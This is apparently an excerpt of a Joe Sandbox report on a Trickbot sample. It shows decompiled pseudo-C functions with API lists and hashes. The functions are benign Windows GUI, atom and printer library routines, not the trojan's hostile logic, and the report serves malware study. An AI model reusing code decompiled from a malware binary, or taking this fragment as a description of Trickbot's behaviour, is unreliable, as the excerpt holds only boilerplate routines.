Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$Enabled$FocusItemLong
String ID:
API String ID: 1558694495-0
Opcode ID: 346d1fefbcdf2b0c84f7d75174d67adafc0a4d144e6aa3e53e4e89fc608e0462
Instruction ID: 03df39c33ee63731004a16e8f88fe2e2a825fb355146438892ea3cbb40895504
Opcode Fuzzy Hash: 346d1fefbcdf2b0c84f7d75174d67adafc0a4d144e6aa3e53e4e89fc608e0462
Instruction Fuzzy Hash: A611E431204311AFDB119F65EC88B9BBBA8EF54350F54552AF882822B1CB75CC50DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00411880, Relevance: 13.6, APIs: 9, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411880() {
				intOrPtr* _t1;
				short _t2;
				int _t3;
				int _t4;
				int _t5;
				int _t6;
				int _t7;
				int _t8;
				int _t9;

				EnterCriticalSection(0x44d320);
				_t1 = 0x44dda0;
				do {
					if( *_t1 != 0) {
						 *_t1 = 0;
					}
					_t1 = _t1 + 0x18;
				} while (_t1 < 0x44de30);
				_t2 = E004108C0();
				if( *0x44d348 != 0) {
					_t9 =  *0x44d348; // 0x0
					_t2 = GlobalDeleteAtom(_t9);
				}
				if( *0x44d34e != 0) {
					_t8 =  *0x44d34e; // 0x0
					_t2 = GlobalDeleteAtom(_t8);
				}
				if( *0x44d34c != 0) {
					_t7 =  *0x44d34c; // 0x0
					_t2 = GlobalDeleteAtom(_t7);
				}
				if( *0x44d34a != 0) {
					_t6 =  *0x44d34a; // 0x0
					_t2 = GlobalDeleteAtom(_t6);
				}
				if( *0x44d352 != 0) {
					_t5 =  *0x44d352; // 0x0
					_t2 = GlobalDeleteAtom(_t5);
				}
				if( *0x44d350 != 0) {
					_t4 =  *0x44d350; // 0x0
					_t2 = GlobalDeleteAtom(_t4);
				}
				if( *0x44d354 != 0) {
					_t3 =  *0x44d354; // 0x0
					_t2 = GlobalDeleteAtom(_t3);
				}
				 *0x44d340 = 0;
				LeaveCriticalSection(0x44d320);
				return _t2;
			}

0x00411886
0x0041188c
0x00411891
0x00411894
0x00411896
0x00411896
0x0041189c
0x0041189f
0x004118a6
0x004118b3
0x004118b5
0x004118c2
0x004118c2
0x004118d4
0x004118d6
0x004118dd
0x004118dd
0x004118e7
0x004118e9
0x004118f0
0x004118f0
0x004118fa
0x004118fc
0x00411903
0x00411903
0x0041190d
0x0041190f
0x00411916
0x00411916
0x00411920
0x00411922
0x00411929
0x00411929
0x00411933
0x00411935
0x0041193c
0x0041193c
0x0041193e
0x0041194d
0x00411954

APIs

EnterCriticalSection.KERNEL32(0044D320,?,00410CDF), ref: 00411886
GlobalDeleteAtom.KERNEL32(00000000), ref: 004118C2
GlobalDeleteAtom.KERNEL32(00000000), ref: 004118DD
GlobalDeleteAtom.KERNEL32(00000000), ref: 004118F0
GlobalDeleteAtom.KERNEL32(00000000), ref: 00411903
GlobalDeleteAtom.KERNEL32(00000000), ref: 00411916
GlobalDeleteAtom.KERNEL32(00000000), ref: 00411929
GlobalDeleteAtom.KERNEL32(00000000), ref: 0041193C
LeaveCriticalSection.KERNEL32(0044D320,?,00410CDF), ref: 0041194D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
String ID:
API String ID: 3843206905-0
Opcode ID: 4a4ff4071e3fd4a90b9e6e5060e217e030cefc0afe1d29e14aa23069c225a3e7
Instruction ID: c3654da1d49b8deecb46209bad9f12e927e857b5048a0aadf628bbfb555053b7
Opcode Fuzzy Hash: 4a4ff4071e3fd4a90b9e6e5060e217e030cefc0afe1d29e14aa23069c225a3e7
Instruction Fuzzy Hash: 051115ADD0061491D7257FE4EC097EA37B8A74A704F088436EE10476B0D7BC48CACBAE

Uniqueness

Uniqueness Score: -1.00%

Function 004272D6, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 209
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004272D6(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
				struct tagRECT _v20;
				signed int _v24;
				intOrPtr _v28;
				struct tagRECT _v44;
				char _v304;
				void* __ebp;
				int _t69;
				signed char _t72;
				signed char _t77;
				signed int _t82;
				signed int _t84;
				void* _t90;
				struct HWND__* _t94;
				intOrPtr _t122;
				intOrPtr _t130;
				void* _t142;
				signed char _t143;
				signed char _t145;
				intOrPtr _t147;
				void* _t149;

				_t142 = __edx;
				_t147 = _a4;
				_t122 = __ecx;
				_t69 = GetWindowRect( *(_t147 + 0x1c),  &_v44);
				if( *((intOrPtr*)(_t147 + 0x70)) != _t122) {
					_t143 = 0;
					__eflags = 0;
					L5:
					if( *((intOrPtr*)(_t122 + 0x78)) != _t143 && ( *(_t147 + 0x68) & 0x00000040) != 0) {
						 *(_t122 + 0x64) =  *(_t122 + 0x64) | 0x00000040;
					}
					 *(_t122 + 0x64) =  *(_t122 + 0x64) & 0xfffffff9;
					_t72 =  *(_t147 + 0x64) & 0x00000006 |  *(_t122 + 0x64);
					 *(_t122 + 0x64) = _t72;
					if((_t72 & 0x00000040) == 0) {
						E0041B72C(_t147,  &_v304, 0x104);
						E004226A8( *(_t122 + 0x1c),  &_v304);
					}
					_t77 = ( *(_t122 + 0x64) ^  *(_t147 + 0x64)) & 0x0000f000 ^  *(_t147 + 0x64) | 0x0000000f;
					if( *((intOrPtr*)(_t122 + 0x78)) == _t143) {
						_t78 = _t77 & 0x000000fe;
						__eflags = _t77 & 0x000000fe;
					} else {
						_t78 = _t77 | 0x00000001;
					}
					E00433299(_t147, _t78);
					_v28 = _t143;
					if( *((intOrPtr*)(_t147 + 0x70)) != _t122 && IsWindowVisible( *(_t147 + 0x1c)) != 0) {
						E0041B784(_t147, _t143, _t143, _t143, _t143, _t143, 0x97);
						_v28 = 1;
					}
					_v24 = _v24 | 0xffffffff;
					if(_a8 == _t143) {
						_t144 = _t122 + 0x7c;
						E00416B4D(_t122 + 0x7c,  *((intOrPtr*)(_t122 + 0x84)), _t147);
						E00416B4D(_t122 + 0x7c,  *((intOrPtr*)(_t144 + 8)), 0);
						_t82 =  *0x44b30c; // 0x2
						_t145 = 0;
						__eflags = 0;
						_t84 =  *0x44b308; // 0x2
						E0041B784(_t147, 0,  ~_t84,  ~_t82, 0, 0, 0x115);
					} else {
						CopyRect( &_v20, _a8);
						E0042147E(_t122,  &_v20);
						asm("cdq");
						asm("cdq");
						_push((_v20.bottom - _v20.top - _t142 >> 1) + _v20.top);
						_push((_v20.right - _v20.left - _t142 >> 1) + _v20.left);
						asm("movsd");
						asm("movsd");
						_push(_a4);
						asm("movsd");
						asm("movsd");
						_v24 = E00427EA1(_t122);
						E0041B784(_a4, 0, _v20.left, _v20.top, _v20.right - _v20.left, _v20.bottom - _v20.top, 0x114);
						_t147 = _a4;
						_t145 = 0;
					}
					if(E0041884D(_t149, GetParent( *(_t147 + 0x1c))) != _t122) {
						if(_t122 != _t145) {
							_t94 =  *(_t122 + 0x1c);
						} else {
							_t94 = 0;
						}
						E0041884D(_t149, SetParent( *(_t147 + 0x1c), _t94));
					}
					_t130 =  *((intOrPtr*)(_t147 + 0x70));
					_t165 = _t130 - _t122;
					if(_t130 != _t122) {
						__eflags = _t130 - _t145;
						if(_t130 == _t145) {
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t122 + 0x78)) - _t145;
						if( *((intOrPtr*)(_t122 + 0x78)) == _t145) {
							L30:
							__eflags = 0;
							L31:
							_push(0);
							_push(0xffffffff);
							goto L32;
						}
						__eflags =  *((intOrPtr*)(_t130 + 0x78)) - _t145;
						if(__eflags != 0) {
							goto L30;
						}
						_push(1);
						_pop(0);
						goto L31;
					} else {
						_push(_t145);
						_push(_v24);
						L32:
						_push(_t147);
						E00427749(_t130, _t165);
						L33:
						_t166 = _v28 - _t145;
						 *((intOrPtr*)(_t147 + 0x70)) = _t122;
						if(_v28 != _t145) {
							E0041B784(_t147, _t145, _t145, _t145, _t145, _t145, 0x57);
						}
						E004276E8(_t122, _t147);
						_t90 = E0042EDF5(_t122, _t166);
						 *(_t90 + 0xb8) =  *(_t90 + 0xb8) | 0x0000000c;
						return _t90;
					}
				}
				_t143 = 0;
				if(_a8 != 0) {
					_t69 = EqualRect( &_v44, _a8);
					if(_t69 == 0) {
						goto L5;
					}
				}
				return _t69;
			}

0x004272d6
0x004272e1
0x004272ec
0x004272ee
0x004272f7
0x0042731b
0x0042731b
0x0042731d
0x00427320
0x00427328
0x00427328
0x0042732c
0x00427339
0x0042733d
0x00427340
0x00427350
0x0042735f
0x0042735f
0x00427373
0x00427379
0x0042737f
0x0042737f
0x0042737b
0x0042737b
0x0042737b
0x00427384
0x0042738c
0x0042738f
0x004273aa
0x004273af
0x004273af
0x004273b6
0x004273bd
0x0042743a
0x00427443
0x0042744f
0x00427454
0x00427459
0x00427459
0x00427465
0x00427470
0x004273bf
0x004273c6
0x004273d2
0x004273e0
0x004273f0
0x004273f8
0x004273f9
0x00427401
0x00427402
0x00427403
0x00427406
0x00427407
0x0042740d
0x0042742e
0x00427433
0x00427436
0x00427436
0x00427486
0x0042748a
0x00427490
0x0042748c
0x0042748c
0x0042748c
0x0042749e
0x0042749e
0x004274a3
0x004274a6
0x004274a8
0x004274b0
0x004274b2
0x00000000
0x00000000
0x004274b4
0x004274b7
0x004274c3
0x004274c3
0x004274c5
0x004274c5
0x004274c6
0x00000000
0x004274c6
0x004274b9
0x004274bc
0x00000000
0x00000000
0x004274be
0x004274c0
0x00000000
0x004274aa
0x004274aa
0x004274ab
0x004274c8
0x004274c8
0x004274c9
0x004274ce
0x004274ce
0x004274d1
0x004274d4
0x004274df
0x004274df
0x004274e7
0x004274ee
0x004274f3
0x00000000
0x004274f3
0x004274a8
0x004272f9
0x004272fe
0x0042730b
0x00427313
0x00000000
0x00427319
0x00427313
0x004274fe

APIs

GetWindowRect.USER32(?,?), ref: 004272EE
EqualRect.USER32(?,?), ref: 0042730B

Part of subcall function 0041B784: SetWindowPos.USER32(?,?,?,00000015,000000FF,000000FF,?), ref: 0041B7AB

IsWindowVisible.USER32(?), ref: 00427394
CopyRect.USER32(?,?), ref: 004273C6
GetParent.USER32(?), ref: 00427478
SetParent.USER32(?,?), ref: 00427497

Strings

@, xrefs: 00427328

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: RectWindow$Parent$CopyEqualVisible
String ID: @
API String ID: 3103310903-2766056989
Opcode ID: 45252a3016a8dda825642b9806041828bc335e3bf2ebc2175d017ae3332ace23
Instruction ID: c013e57d3912e20942472ec6bb72c044c9e9542d13c4ab745a507247cd5121f0
Opcode Fuzzy Hash: 45252a3016a8dda825642b9806041828bc335e3bf2ebc2175d017ae3332ace23
Instruction Fuzzy Hash: B861E231B04615EFCF20EF69DC85AAFBBB9EF84304F50452EF912962A1C7789941CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00427501, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00427501(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
				struct tagRECT _v20;
				struct tagRECT _v36;
				char _v296;
				void* __ebp;
				int _t61;
				signed char _t64;
				signed char _t69;
				void* _t79;
				struct HWND__* _t81;
				intOrPtr _t109;
				signed int _t115;
				signed int _t117;
				void* _t130;
				signed int _t131;
				intOrPtr _t134;
				void* _t136;

				_t130 = __edx;
				_t134 = _a4;
				_t109 = __ecx;
				_t61 = GetWindowRect( *(_t134 + 0x1c),  &_v36);
				if( *((intOrPtr*)(_t134 + 0x70)) != _t109) {
					L3:
					if( *((intOrPtr*)(_t109 + 0x78)) != 0 && ( *(_t134 + 0x68) & 0x00000040) != 0) {
						 *(_t109 + 0x64) =  *(_t109 + 0x64) | 0x00000040;
					}
					 *(_t109 + 0x64) =  *(_t109 + 0x64) & 0xfffffff9;
					_t64 =  *(_t134 + 0x64) & 0x00000006 |  *(_t109 + 0x64);
					 *(_t109 + 0x64) = _t64;
					if((_t64 & 0x00000040) == 0) {
						E0041B72C(_t134,  &_v296, 0x104);
						E004226A8( *(_t109 + 0x1c),  &_v296);
					}
					_t69 = ( *(_t109 + 0x64) ^  *(_t134 + 0x64)) & 0x0000f000 ^  *(_t134 + 0x64) | 0x0000000f;
					if( *((intOrPtr*)(_t109 + 0x78)) == 0) {
						_t70 = _t69 & 0x000000fe;
						__eflags = _t69 & 0x000000fe;
					} else {
						_t70 = _t69 | 0x00000001;
					}
					E00433299(_t134, _t70);
					_t131 = E00427E16(_t109, GetDlgCtrlID( *(_t134 + 0x1c)) & 0x0000ffff, 0xffffffff);
					if(_t131 > 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x80)) + _t131 * 4)) = _t134;
					}
					if(_a8 == 0) {
						__eflags = _t131 - 1;
						if(_t131 < 1) {
							_t132 = _t109 + 0x7c;
							E00416B4D(_t109 + 0x7c,  *((intOrPtr*)(_t109 + 0x84)), _t134);
							E00416B4D(_t109 + 0x7c,  *((intOrPtr*)(_t132 + 8)), 0);
						}
						_t115 =  *0x44b30c; // 0x2
						__eflags = 0;
						_push(0x115);
						_push(0);
						_push(0);
						_push( ~_t115);
						_t117 =  *0x44b308; // 0x2
						_push( ~_t117);
						_push(0);
					} else {
						CopyRect( &_v20, _a8);
						E0042147E(_t109,  &_v20);
						if(_t131 < 1) {
							asm("cdq");
							asm("cdq");
							_push((_v20.bottom - _v20.top - _t130 >> 1) + _v20.top);
							_push((_v20.right - _v20.left - _t130 >> 1) + _v20.left);
							asm("movsd");
							asm("movsd");
							_push(_a4);
							asm("movsd");
							asm("movsd");
							E00427EA1(_t109);
							_t134 = _a4;
						}
						_push(0x114);
						_push(_v20.bottom - _v20.top);
						_push(_v20.right - _v20.left);
						_push(_v20.top);
						_push(_v20.left);
						_push(0);
					}
					E0041B784(_t134);
					if(E0041884D(_t136, GetParent( *(_t134 + 0x1c))) != _t109) {
						if(_t109 != 0) {
							_t81 =  *(_t109 + 0x1c);
						} else {
							_t81 = 0;
						}
						E0041884D(_t136, SetParent( *(_t134 + 0x1c), _t81));
					}
					_t120 =  *((intOrPtr*)(_t134 + 0x70));
					_t153 =  *((intOrPtr*)(_t134 + 0x70));
					if( *((intOrPtr*)(_t134 + 0x70)) != 0) {
						E00427749(_t120, _t153, _t134, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t134 + 0x70)) = _t109;
					_t79 = E0042EDF5(_t109, _t153);
					 *(_t79 + 0xb8) =  *(_t79 + 0xb8) | 0x0000000c;
					return _t79;
				}
				if(_a8 != 0) {
					_t61 = EqualRect( &_v36, _a8);
					if(_t61 == 0) {
						goto L3;
					}
				}
				return _t61;
			}

0x00427501
0x0042750c
0x00427517
0x00427519
0x00427522
0x00427543
0x00427547
0x0042754f
0x0042754f
0x00427553
0x00427560
0x00427564
0x00427567
0x00427577
0x00427586
0x00427586
0x0042759a
0x004275a1
0x004275a7
0x004275a7
0x004275a3
0x004275a3
0x004275a3
0x004275ac
0x004275c7
0x004275cb
0x004275d3
0x004275d3
0x004275da
0x0042764f
0x00427652
0x00427654
0x0042765d
0x00427669
0x00427669
0x0042766e
0x00427674
0x00427676
0x0042767b
0x0042767e
0x0042767f
0x00427680
0x00427688
0x00427689
0x004275dc
0x004275e3
0x004275ef
0x004275f7
0x00427602
0x00427612
0x0042761a
0x0042761b
0x00427623
0x00427624
0x00427625
0x00427628
0x00427629
0x0042762a
0x0042762f
0x0042762f
0x00427635
0x0042763d
0x00427644
0x00427645
0x00427648
0x0042764b
0x0042764b
0x0042768c
0x004276a2
0x004276a6
0x004276ac
0x004276a8
0x004276a8
0x004276a8
0x004276ba
0x004276ba
0x004276bf
0x004276c2
0x004276c4
0x004276cb
0x004276cb
0x004276d2
0x004276d5
0x004276da
0x00000000
0x004276da
0x00427528
0x00427535
0x0042753d
0x00000000
0x00000000
0x0042753d
0x004276e5

APIs

GetWindowRect.USER32(?,?), ref: 00427519
EqualRect.USER32(?,00000000), ref: 00427535
GetDlgCtrlID.USER32(?), ref: 004275B6
CopyRect.USER32(?,00000000), ref: 004275E3
GetParent.USER32(?), ref: 00427694
SetParent.USER32(?,?), ref: 004276B3

Strings

@, xrefs: 0042754F

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Parent$CopyCtrlEqualWindow
String ID: @
API String ID: 3581194824-2766056989
Opcode ID: eb752216d629d721ef81a2f569ba0f31a8e54fe6635466f30bbdf336c63728ad
Instruction ID: 6e204e71504efc12537ac9430bac7e5aed1844e1737930437afc70cf03ad7d0f
Opcode Fuzzy Hash: eb752216d629d721ef81a2f569ba0f31a8e54fe6635466f30bbdf336c63728ad
Instruction Fuzzy Hash: 4851BC71704625EFCF14DFA8DC85AAE77AAEF44314F40452EF911DA2A1CB78E841CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0041A296, Relevance: 12.1, APIs: 8, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041A296(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct tagRECT* _a20, intOrPtr _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebp;
				int _t56;
				intOrPtr* _t57;
				signed short _t62;
				void* _t63;
				void* _t67;
				intOrPtr* _t80;
				signed int _t83;
				struct HWND__* _t86;
				void* _t87;

				_t67 = __ecx;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x1c),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(_a16 == 1) {
					_v40 = _v40 & 0x00000000;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t56 = GetTopWindow( *(_t67 + 0x1c));
				_t86 = _t56;
				while(_t86 != 0) {
					_t62 = GetDlgCtrlID(_t86);
					_push(_t86);
					_t83 = _t62 & 0x0000ffff;
					_t63 = E00418874();
					if(_t83 != _a12) {
						if(_t83 >= _a4 && _t83 <= _a8 && _t63 != 0) {
							SendMessageA(_t86, 0x361, 0,  &_v40);
						}
					} else {
						_v8 = _t86;
					}
					_t56 = GetWindow(_t86, 2);
					_t86 = _t56;
				}
				if(_a16 != 1) {
					if(_a12 != 0 && _v8 != 0) {
						_t57 = E0041884D(_t87, _v8);
						if(_a16 == 2) {
							_t80 = _a20;
							_v36.left = _v36.left +  *_t80;
							_v36.top = _v36.top +  *((intOrPtr*)(_t80 + 4));
							_v36.right = _v36.right -  *((intOrPtr*)(_t80 + 8));
							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t80 + 0xc));
						}
						 *((intOrPtr*)( *_t57 + 0x60))( &_v36, 0);
						_t56 = E0041A3D0( &_v40, _v8,  &_v36);
					}
					if(_v40 != 0) {
						_t56 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t56 = _a20;
						 *((intOrPtr*)(_t56 + 8)) = _v20;
						 *((intOrPtr*)(_t56 + 4)) = 0;
						 *_t56 = 0;
						 *((intOrPtr*)(_t56 + 0xc)) = _v16;
					} else {
						_t56 = CopyRect(_a20,  &_v36);
					}
				}
				return _t56;
			}

0x0041a2a1
0x0041a2ab
0x0041a2ae
0x0041a2b1
0x0041a2b4
0x0041a2b7
0x0041a2c9
0x0041a2b9
0x0041a2bc
0x0041a2bd
0x0041a2be
0x0041a2bf
0x0041a2bf
0x0041a2d3
0x0041a2e2
0x0041a2d5
0x0041a2dd
0x0041a2dd
0x0041a2e9
0x0041a2ef
0x0041a2f3
0x0041a2f8
0x0041a2fe
0x0041a2ff
0x0041a302
0x0041a30a
0x0041a314
0x0041a32a
0x0041a32a
0x0041a30c
0x0041a30c
0x0041a30c
0x0041a333
0x0041a339
0x0041a339
0x0041a341
0x0041a370
0x0041a37a
0x0041a383
0x0041a385
0x0041a38a
0x0041a390
0x0041a396
0x0041a39c
0x0041a39c
0x0041a3a8
0x0041a3b6
0x0041a3b6
0x0041a3be
0x0041a3c3
0x0041a3c3
0x0041a343
0x0041a346
0x0041a357
0x0041a35d
0x0041a363
0x0041a366
0x0041a368
0x0041a348
0x0041a34f
0x0041a34f
0x0041a346
0x0041a3cd

APIs

GetClientRect.USER32(?,?), ref: 0041A2C9
BeginDeferWindowPos.USER32(00000008), ref: 0041A2D7
GetTopWindow.USER32(?), ref: 0041A2E9
GetDlgCtrlID.USER32(00000000), ref: 0041A2F8
SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 0041A32A
GetWindow.USER32(00000000,00000002), ref: 0041A333
CopyRect.USER32(?,?), ref: 0041A34F

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
String ID:
API String ID: 3332788312-0
Opcode ID: c585fcbf80c8228befd741fc4a9a19b30d35f75822540120c6c310733a15aff0
Instruction ID: b3ce3c85b3990ca3c2a80dc1803e56427cde69241eddf32b77d962f9067b73e5
Opcode Fuzzy Hash: c585fcbf80c8228befd741fc4a9a19b30d35f75822540120c6c310733a15aff0
Instruction Fuzzy Hash: D7417D3190620DEFCF14DF94D9849EEB7B5FF08311B14416BE812A7210C7789EA0CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041D926, Relevance: 12.1, APIs: 8, Instructions: 73
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D926(char* _a4, CHAR* _a8) {
				short _v524;
				short _v1044;
				short _v1564;
				void* _t19;
				int _t20;
				char* _t29;
				int _t31;
				char* _t34;
				void* _t37;
				void* _t39;

				_t34 = _a4;
				if(lstrcmpiA(_t34, _a8) != 0) {
					L10:
					return 0;
				}
				if(GetSystemMetrics(0x2a) == 0) {
					L8:
					_t19 = 1;
					return _t19;
				}
				_t20 = lstrlenA(_t34);
				if(_t20 != lstrlenA(_a8)) {
					goto L10;
				}
				_t31 = GetThreadLocale();
				GetStringTypeA(_t31, 1, _t34, 0xffffffff,  &_v524);
				GetStringTypeA(_t31, 4, _t34, 0xffffffff,  &_v1044);
				GetStringTypeA(_t31, 1, _a8, 0xffffffff,  &_v1564);
				_t29 = _t34;
				if( *_t34 == 0) {
					goto L8;
				}
				_t37 = 0;
				while(( *(_t39 + _t37 - 0x410) & 0x00000080) == 0 ||  *((intOrPtr*)(_t39 + _t37 - 0x208)) ==  *((intOrPtr*)(_t39 + _t37 - 0x618))) {
					_t37 = _t37 + 2;
					if( *_t29 != 0) {
						continue;
					}
					goto L8;
				}
				goto L10;
			}

0x0041d932
0x0041d941
0x0041d9e5
0x00000000
0x0041d9e5
0x0041d951
0x0041d9db
0x0041d9dd
0x00000000
0x0041d9dd
0x0041d95e
0x0041d969
0x00000000
0x00000000
0x0041d977
0x0041d986
0x0041d995
0x0041d9a6
0x0041d9ab
0x0041d9ad
0x00000000
0x00000000
0x0041d9af
0x0041d9b1
0x0041d9cf
0x0041d9d9
0x00000000
0x00000000
0x00000000
0x0041d9d9
0x00000000

APIs

lstrcmpiA.KERNEL32(?,?), ref: 0041D939
GetSystemMetrics.USER32(0000002A), ref: 0041D949
lstrlenA.KERNEL32(?), ref: 0041D95E
lstrlenA.KERNEL32(?), ref: 0041D965
GetThreadLocale.KERNEL32 ref: 0041D96B
GetStringTypeA.KERNEL32(00000000,00000001,?,000000FF,?), ref: 0041D986
GetStringTypeA.KERNEL32(00000000,00000004,?,000000FF,?), ref: 0041D995
GetStringTypeA.KERNEL32(00000000,00000001,?,000000FF,?), ref: 0041D9A6

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: StringType$lstrlen$LocaleMetricsSystemThreadlstrcmpi
String ID:
API String ID: 1373347803-0
Opcode ID: 6ea4a2bf404da2791ec5b8215527192623c73b6cc160b1ff66e0d5367e28a892
Instruction ID: 6a14a82563ca4a704f9114181d38e82301ce5037ceb9fe3c7245a22d6d86a1db
Opcode Fuzzy Hash: 6ea4a2bf404da2791ec5b8215527192623c73b6cc160b1ff66e0d5367e28a892
Instruction Fuzzy Hash: EF110AF1A002187ADF211B619C44FEB7B6CDB45720F100662FD21922D0E6B49DC1CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF5F, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041BF5F(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x98);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x94);
							if( *(_t35 + 0x94) != 0) {
								E00422790(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x94) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E00422790( *(_t35 + 0x94));
								 *(_t35 + 0x94) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x0041bf62
0x0041bf65
0x0041bf6a
0x0041bf72
0x0041bf8b
0x0041bf93
0x0041bf9d
0x0041bfa4
0x0041bfa6
0x0041bfae
0x0041bfb1
0x0041bfb1
0x0041bfc8
0x0041bfcf
0x0041bfea
0x0041bff2
0x0041bff7
0x0041bff7
0x0041c000
0x0041c000
0x0041bfa4
0x0041bf93
0x0041c009

APIs

GlobalLock.KERNEL32(?), ref: 0041BF7F
lstrcmpA.KERNEL32(?,?), ref: 0041BF8B
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0041BF9D
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041BFC0
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041BFC8
GlobalLock.KERNEL32(00000000), ref: 0041BFD5
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0041BFE2
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 0041C000

Part of subcall function 00422790: GlobalFlags.KERNEL32(?), ref: 0042279A
Part of subcall function 00422790: GlobalUnlock.KERNEL32(?), ref: 004227B1
Part of subcall function 00422790: GlobalFree.KERNEL32(?), ref: 004227BC

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
